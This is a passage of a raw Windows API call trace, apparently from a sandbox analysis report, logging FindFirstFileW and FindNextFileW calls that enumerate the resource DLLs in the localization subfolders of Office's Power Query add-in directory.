hFindFile=0xf71ac0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6866e01, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6866e01, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6866e01, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x32040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0047.455] FindNextFileW (in: hFindFile=0xf71ac0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x5c164a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5c164a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5c164a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8b040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0047.455] FindNextFileW (in: hFindFile=0xf71ac0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x5c164a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5c164a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5c164a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8b040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 0 [0047.455] FindClose (in: hFindFile=0xf71ac0 | out: hFindFile=0xf71ac0) returned 1 [0047.456] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3ce00c0 | out: hHeap=0x2a60000) returned 1 [0047.456] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff31e88, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x624ad43, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x624ad43, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de", cAlternateFileName="")) returned 1 [0047.456] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\de\\*", lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff31e88, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x624ad43, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x624ad43, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xf71fc0 [0047.457] FindNextFileW (in: hFindFile=0xf71fc0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff31e88, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x624ad43, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x624ad43, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.457] FindNextFileW (in: hFindFile=0xf71fc0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeff31e88, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeff31e88, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf003cf13, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xf040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0047.457] FindNextFileW (in: hFindFile=0xf71fc0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x22a9f7a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x22a9f7a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x22f6470, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x29040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0047.457] FindNextFileW (in: hFindFile=0xf71fc0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x624ad43, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x624ad43, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x624ad43, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x33aa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0047.457] FindNextFileW (in: hFindFile=0xf71fc0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x5eb74f1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5eb74f1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5f4ff2d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x91040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0047.457] FindNextFileW (in: hFindFile=0xf71fc0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x5eb74f1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5eb74f1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5f4ff2d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x91040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 0 [0047.457] FindClose (in: hFindFile=0xf71fc0 | out: hFindFile=0xf71fc0) returned 1 [0047.458] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3ce00c0 | out: hHeap=0x2a60000) returned 1 [0047.458] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf472b09c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf472b09c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf475131d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4fe050, dwReserved0=0x0, dwReserved1=0x0, cFileName="DocumentFormat.OpenXml.dll", cAlternateFileName="DOCUME~1.DLL")) returned 1 [0047.458] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf00d5872, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6c93006, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6c93006, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el", cAlternateFileName="")) returned 1 [0047.458] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\el\\*", lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf00d5872, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6c93006, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6c93006, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xf71b00 [0047.460] FindNextFileW (in: hFindFile=0xf71b00, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf00d5872, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6c93006, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6c93006, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.460] FindNextFileW (in: hFindFile=0xf71b00, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x231c662, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x231c662, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x231c662, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0047.460] FindNextFileW (in: hFindFile=0xf71b00, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6c93006, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6c93006, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6c93006, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x33040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0047.460] FindNextFileW (in: hFindFile=0xf71b00, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1dbe1c1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1dbe1c1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1dbe1c1, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x42040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0047.460] FindNextFileW (in: hFindFile=0xf71b00, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf00d5872, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf00d5872, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf00d5872, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xbcaa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0047.460] FindNextFileW (in: hFindFile=0xf71b00, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf00d5872, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf00d5872, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf00d5872, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xbcaa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 0 [0047.460] FindClose (in: hFindFile=0xf71b00 | out: hFindFile=0xf71b00) returned 1 [0047.461] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3ce00c0 | out: hHeap=0x2a60000) returned 1 [0047.461] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf47e9c8f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6e5cc4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es", cAlternateFileName="")) returned 1 [0047.461] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\es\\*", lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf47e9c8f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6e5cc4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xf71a40 [0047.462] FindNextFileW (in: hFindFile=0xf71a40, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf47e9c8f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6e5cc4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.462] FindNextFileW (in: hFindFile=0xf71a40, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x18157e1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18157e1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1887f3e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0047.462] FindNextFileW (in: hFindFile=0xf71a40, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6e5cc4e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6e5cc4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x27aa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0047.462] FindNextFileW (in: hFindFile=0xf71a40, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf47e9c8f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf47e9c8f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4a25fae, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x32aa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0047.462] FindNextFileW (in: hFindFile=0xf71a40, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa2f5c0f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa2f5c0f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa2f5c0f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8baa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0047.463] FindNextFileW (in: hFindFile=0xf71a40, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa2f5c0f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa2f5c0f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa2f5c0f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8baa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 0 [0047.463] FindClose (in: hFindFile=0xf71a40 | out: hFindFile=0xf71a40) returned 1 [0047.463] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3ce00c0 | out: hHeap=0x2a60000) returned 1 [0047.463] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0df27d3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8719376, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x8719376, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="et", cAlternateFileName="")) returned 1 [0047.463] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\et\\*", lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0df27d3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8719376, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x8719376, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xf72140 [0047.464] FindNextFileW (in: hFindFile=0xf72140, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0df27d3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8719376, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x8719376, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.464] FindNextFileW (in: hFindFile=0xf72140, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x381f2dc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x381f2dc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x381f2dc, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xdaa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0047.464] FindNextFileW (in: hFindFile=0xf72140, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc70564d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc70564d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc70564d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x26040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0047.464] FindNextFileW (in: hFindFile=0xf72140, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8719376, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x8719376, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x91adba5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x30aa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0047.465] FindNextFileW (in: hFindFile=0xf72140, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf0df27d3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf0df27d3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf0df27d3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x85040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0047.465] FindNextFileW (in: hFindFile=0xf72140, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf0df27d3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf0df27d3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf0df27d3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x85040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 0 [0047.465] FindClose (in: hFindFile=0xf72140 | out: hFindFile=0xf72140) returned 1 [0047.465] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3ce00c0 | out: hHeap=0x2a60000) returned 1 [0047.465] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf41cdbc1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x69980f7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x69980f7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="eu", cAlternateFileName="")) returned 1 [0047.465] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\eu\\*", lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf41cdbc1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x69980f7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x69980f7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xf71e80 [0047.639] FindNextFileW (in: hFindFile=0xf71e80, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf41cdbc1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x69980f7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x69980f7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.639] FindNextFileW (in: hFindFile=0xf71e80, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf41cdbc1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf41cdbc1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf41f3e26, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xf040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0047.639] FindNextFileW (in: hFindFile=0xf71e80, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xa39cfa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xa39cfa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xa39cfa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x26040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0047.639] FindNextFileW (in: hFindFile=0xf71e80, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x69980f7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x69980f7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x69980f7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x32040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0047.639] FindNextFileW (in: hFindFile=0xf71e80, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1920897, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1920897, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x196cd32, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x87aa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0047.639] FindNextFileW (in: 